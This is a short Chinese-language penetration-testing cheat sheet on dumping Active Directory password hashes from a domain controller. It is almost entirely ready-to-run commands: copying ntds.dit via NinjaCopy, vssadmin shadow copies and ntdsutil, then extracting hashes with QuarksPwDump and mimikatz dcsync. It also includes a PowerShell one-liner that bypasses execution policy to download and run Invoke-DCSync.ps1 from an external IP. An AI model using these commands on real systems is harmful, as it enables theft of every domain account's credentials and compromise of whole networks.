域渗透:转储Active Directory数据库(导出域控hash)
前言:获取Windows域控所有用户hash笔记
NTDS.DIT文件经常被操作系统使用,因此无法直接复制到其他位置以提取信息。可以在Windows以下位置找到此文件
NinjaCopy
工具地址: https://github.com/3gstudent/NinjaCopy
使用NinjaCopy复制ntds.dit
工具地址:https://github.com/quarkslab/quarkspwdump
使用quarkspwdump导出hash
修复ntds.dit
esentutl /p /o ntds.dit
导入域hash
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
powershell_Invoke-DCSync
powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://120.79.66.58/mypowershell/Invoke-DCSync.ps1');Invoke-DCSync -PWDumpFormat"
mimikatz
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
vssadmin
vssadmin卷影副本导出ntds.dit
vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
ntdsutil
ntdsutil导出ntds.dit
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
导入域hash
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt